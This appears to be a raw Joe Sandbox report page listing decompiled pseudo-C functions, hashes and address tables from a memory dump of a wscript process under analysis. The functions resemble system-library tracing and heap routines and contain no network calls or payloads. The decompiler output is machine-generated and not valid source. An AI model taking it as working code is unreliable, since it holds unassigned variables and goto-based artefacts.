0x059ffea0
0x059ffea1
0x059ffea3
0x059ffea8
0x059ffebd

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50409c2d6f20bea5ec6aa74ad5b492fc4f21e1e209004380ebe9fe911f21a2e
Instruction ID: e31bb2ca48b38a80a8890c927c84ec64f8cfde3661c18ae07fce39dc492945a6
Opcode Fuzzy Hash: e50409c2d6f20bea5ec6aa74ad5b492fc4f21e1e209004380ebe9fe911f21a2e
Instruction Fuzzy Hash: 2A018471B04208ABDB14EFA9D845FBEBBB8EF84714F004066B901AB291DA74E901C794

Uniqueness

Uniqueness Score: -1.00%

Function 0595B02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0595B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E05967D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E059C7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0595b037
0x0595b039
0x0595b03b
0x0595b040
0x059aa60e
0x00000000
0x00000000
0x059aa61d
0x0595b04b
0x0595b04e
0x059aa627
0x059aa634
0x00000000
0x00000000
0x059aa641
0x059aa653
0x059aa643
0x059aa64c
0x059aa64c
0x059aa65b
0x00000000
0x00000000
0x00000000
0x059aa66c
0x0595b057
0x0595b057
0x0595b057
0x0595b046
0x0595b046
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 478ca2fa7143d6f332bf130a7ea92e2fca63c17375cbe5c16e16f2869b130a70
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: F5018F722049809FD322CB6CC988F7677DEFB85764F0944A1F91ACBA95D728DC40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05A11074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05A11074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E05A1165E(__ebx, 0x5a38ae4, (__edx -  *0x5a38b04 >> 0x14) + (__edx -  *0x5a38b04 >> 0x14), __edi, __ecx, (__edx -  *0x5a38b04 >> 0x14) + (__edx -  *0x5a38b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E05A0AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E05967D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E059FFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x05a11074
0x05a11080
0x05a11082
0x05a1108a
0x05a1108f
0x05a11093
0x05a110ab
0x05a110ab
0x05a110c3
0x05a110cf
0x05a110e1
0x05a110d1
0x05a110da
0x05a110da
0x05a110e9
0x05a110f5
0x05a110f5
0x05a110fe

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e560941bef996874ac1e23f3f1dfe2cd149134c55d6e527e35c5547b8971300c
Instruction ID: 7086ee270a19ecb417f8d261dd8b68afea1449ca7a5755e3101c30cac8d0bedb
Opcode Fuzzy Hash: e560941bef996874ac1e23f3f1dfe2cd149134c55d6e527e35c5547b8971300c
Instruction Fuzzy Hash: 6D012872A097429BC710DF78D944F1A77E5BBC4314F04C519FD9683290DE34E545CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05A18ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05A18ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x5a3d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E05967D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0598B640(E05989AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x05a18ed6
0x05a18ee5
0x05a18eed
0x05a18ef0
0x05a18efa
0x05a18f03
0x05a18f0c
0x05a18f15
0x05a18f24
0x05a18f27
0x05a18f31
0x05a18f43
0x05a18f33
0x05a18f3c
0x05a18f3c
0x05a18f4e
0x05a18f4f
0x05a18f51
0x05a18f56
0x05a18f69

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc5a95df891cbcfda3ab5113e0c88e5cbaea00b3c2e2925f7f51299aca04806
Instruction ID: 0af38bb63dddef8fcdf86f76b13658ec260b8a0d21fbcc1c4928ebc5400b13c0
Opcode Fuzzy Hash: 0dc5a95df891cbcfda3ab5113e0c88e5cbaea00b3c2e2925f7f51299aca04806
Instruction Fuzzy Hash: C2111E70A042099FDB04DFA8D445BAEBBF4FF08700F0442AAE919EB382E6349940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05A18A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05A18A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x5a3d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E05967D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0598B640(E05989AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x05a18a62
0x05a18a71
0x05a18a79
0x05a18a82
0x05a18a85
0x05a18a89
0x05a18a8c
0x05a18a8f
0x05a18a92
0x05a18a95
0x05a18a9f
0x05a18ab1
0x05a18aa1
0x05a18aaa
0x05a18aaa
0x05a18abc
0x05a18abd
0x05a18abf
0x05a18ac4
0x05a18ada

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1726d2675b8dc6d77fd7d3f5dbff0a2eb93af70edbb95ddc39751cd6f85f4bde
Instruction ID: 044231e6d704b16eea54073556176d19cb64dfe8f9163e1f6f988e6be609407c
Opcode Fuzzy Hash: 1726d2675b8dc6d77fd7d3f5dbff0a2eb93af70edbb95ddc39751cd6f85f4bde
Instruction Fuzzy Hash: 00012C71A0021DAFCB00DFA9D9859EEBBB8FF48350F50405AF905E7351DB34A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0594DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0594DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0594DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0594E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0594E8B0(__ecx, _t14, 0xfff);
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0594db64
0x0594db66
0x0594db6b
0x0594dbaa
0x0594db71
0x0594db76
0x0594db7a
0x0594dba3
0x0594db7c
0x0594db87
0x0594db8b
0x059a4fa1
0x059a4fb3
0x059a4fb8
0x0594db91
0x0594db96
0x0594db98
0x0594db98
0x0594db8b
0x0594db7a
0x0594db9d
0x0594dba2

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: cef4979360a5520cc4205a017919f6d59e1207dbbd7f9d15261c6f3da44fed3f
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: D1F0FC3B3057229FD7329A554884F27B69E9FC1A60F150435F1059B344C9649C028EE1

Uniqueness

Uniqueness Score: -1.00%

Function 0594B1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0594B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E05967D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E05967D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E059C7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0594b1e8
0x0594b1ea
0x0594b1f3
0x059a4a17
0x0594b1f9
0x0594b1f9
0x0594b1f9
0x0594b201
0x059a4a21
0x059a4a2e
0x00000000
0x00000000
0x059a4a3b
0x059a4a4d
0x059a4a3d
0x059a4a46
0x059a4a46
0x059a4a55
0x00000000
0x00000000
0x00000000
0x0594b20a
0x0594b20a
0x0594b20a
0x0594b20a

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: f70fcb3f1939eb5902508da2ae32e997d10d2a6f653590bbc8253be8a2fb2e76
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 5C01D1322046809BDB229759C908F697BDEFF91758F0804A1FA198B6B1D6B8DC00C765

Uniqueness

Uniqueness Score: -1.00%

Function 059DFE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E059DFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x5a3d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E05967D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0598B640(E05989AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x059dfe96
0x059dfe9e
0x059dfea1
0x059dfead
0x059dfeb3
0x059dfeb9
0x059dfec3
0x059dfed5
0x059dfec5
0x059dfece
0x059dfece
0x059dfee0
0x059dfee1
0x059dfee3
0x059dfee8
0x059dfefb

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918e362e515c24d57410b11513eb7624e2b1db5cd55410be15851f85e45d5cff
Instruction ID: 158e100b5a3df50f0e7380966db21eba4d11a18d44fdac65765122579727e885
Opcode Fuzzy Hash: 918e362e515c24d57410b11513eb7624e2b1db5cd55410be15851f85e45d5cff
Instruction Fuzzy Hash: 0E013670A0420CEFCB14DFA8D946A6EB7F4FF44304F144599B555DB392DA35E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05A18F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05A18F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x5a3d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E05967D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0598B640(E05989AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05a18f6a
0x05a18f79
0x05a18f81
0x05a18f84
0x05a18f8b
0x05a18f91
0x05a18f94
0x05a18f9e
0x05a18fb0
0x05a18fa0
0x05a18fa9
0x05a18fa9
0x05a18fbb
0x05a18fbc
0x05a18fbe
0x05a18fc3
0x05a18fd6

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f14a4b48fe86ab38a116109991b077c10b6ab7b6ae7071992e34d26753f593f
Instruction ID: ee959ec1b8c7b7584239ace6777680166ad219de2232563d63e3d3b36397a697
Opcode Fuzzy Hash: 7f14a4b48fe86ab38a116109991b077c10b6ab7b6ae7071992e34d26753f593f
Instruction Fuzzy Hash: 50013C74A04209AFDB00EFA8D549AAEB7F4EF48300F104459B905EB381EA34EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05A0131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05A0131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x5a3d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E05967D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0598B640(E05989AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05a0131b
0x05a0132a
0x05a01330
0x05a01336
0x05a0133e
0x05a01341
0x05a01344
0x05a0134f
0x05a01361
0x05a01351
0x05a0135a
0x05a0135a
0x05a0136c
0x05a0136d
0x05a0136f
0x05a01374
0x05a01387

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be72ab72c44ece6493995dbad41d18030ca84efb1ff5e8b9eae68ac76486fea9
Instruction ID: 4fe499e529cedc506fb0ddc6ba07c66f118ab93bdb155ec47940090b0c449038
Opcode Fuzzy Hash: be72ab72c44ece6493995dbad41d18030ca84efb1ff5e8b9eae68ac76486fea9
Instruction Fuzzy Hash: 34013C71E15208AFCB44EFA9D949AAEB7F4FF48700F408059B845EB391EA34EA00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 05A01608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E05A01608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x5a3d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E05967D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0598B640(E05989AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x05a01608
0x05a01617
0x05a0161d
0x05a01625
0x05a01628
0x05a0162b
0x05a01636
0x05a01648
0x05a01638
0x05a01641
0x05a01641
0x05a01653
0x05a01654
0x05a01656
0x05a0165b
0x05a0166e

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599ba48cc8b6a8b4b36c090ea7d9dded066d26e416426128571434fd76b2019b
Instruction ID: f48b41728805fb0bc497c1defc9e1f5483e5185ad858b9c211af88600fa8091a
Opcode Fuzzy Hash: 599ba48cc8b6a8b4b36c090ea7d9dded066d26e416426128571434fd76b2019b
Instruction Fuzzy Hash: EAF04F71A14248EFDB04EFE8D845EAEB7F4EF44300F044059B915EB291EA34E900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0596C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0596C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0596C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x59211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E05A188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0596c577
0x0596c57d
0x0596c581
0x0596c5b5
0x0596c5b9
0x0596c5ce
0x0596c5ce
0x0596c5ca
0x00000000
0x0596c5ca
0x0596c5c4
0x0596c5c8
0x00000000
0x00000000
0x00000000
0x0596c5ad
0x00000000
0x0596c5af

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7173b38655c63e15c86aaa6d380f8016086a1652df5e57a84876c80c9ce649
Instruction ID: 472b509ac19fb4298c6aa764dfde3d081685e2a1f67b5b7bcb105c9e0750ee57
Opcode Fuzzy Hash: 4e7173b38655c63e15c86aaa6d380f8016086a1652df5e57a84876c80c9ce649
Instruction Fuzzy Hash: A1F0BEB291D6A49FD731C728C95CF227FEDAB05670F44886BF48687211C6A4DC88C295

Uniqueness

Uniqueness Score: -1.00%

Function 05A18D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E05A18D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x5a3d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E05967D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0598B640(E05989AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x05a18d34
0x05a18d43
0x05a18d4b
0x05a18d4e
0x05a18d52
0x05a18d5c
0x05a18d6e
0x05a18d5e
0x05a18d67
0x05a18d67
0x05a18d79
0x05a18d7a
0x05a18d7c
0x05a18d81
0x05a18d94

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feafde6c45494254f1f1cb784362cf14cf97e5e7f3c87940ba376cf63fe4cc2d
Instruction ID: e0346918f0827dd1077fa7c7b69bd2905ce5e1ed138f2070d7d955d512f60986
Opcode Fuzzy Hash: feafde6c45494254f1f1cb784362cf14cf97e5e7f3c87940ba376cf63fe4cc2d
Instruction Fuzzy Hash: 32F09070A046089FDB04EBA8D446A6E77B4EB44244F108099E906AB290DA34E9008754

Uniqueness

Uniqueness Score: -1.00%

Function 05A02073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05A02073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E059FFD22(__ecx);
				_t19 =  *0x5a3849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x5a38748; // 0x0
					if(__eflags <= 0) {
						E05A01C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x5a38724 & 0x00000004;
							if(( *0x5a38724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x5a38724; // 0x0
					return E059F8DF1(__ebx, 0xc0000374, 0x5a35890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05a02076
0x05a02078
0x05a0207d
0x05a02083
0x05a020a4
0x05a020aa
0x05a020ac
0x05a020b7
0x05a020ba
0x05a020bc
0x05a020c9
0x05a020c9
0x05a020d0
0x05a020d2
0x00000000
0x05a020d2
0x05a020be
0x05a020c3
0x05a020c5
0x05a020c7
0x00000000
0x00000000
0x05a020c7
0x05a020bc
0x05a020d4
0x05a02085
0x05a02085
0x05a020a3
0x05a020a3

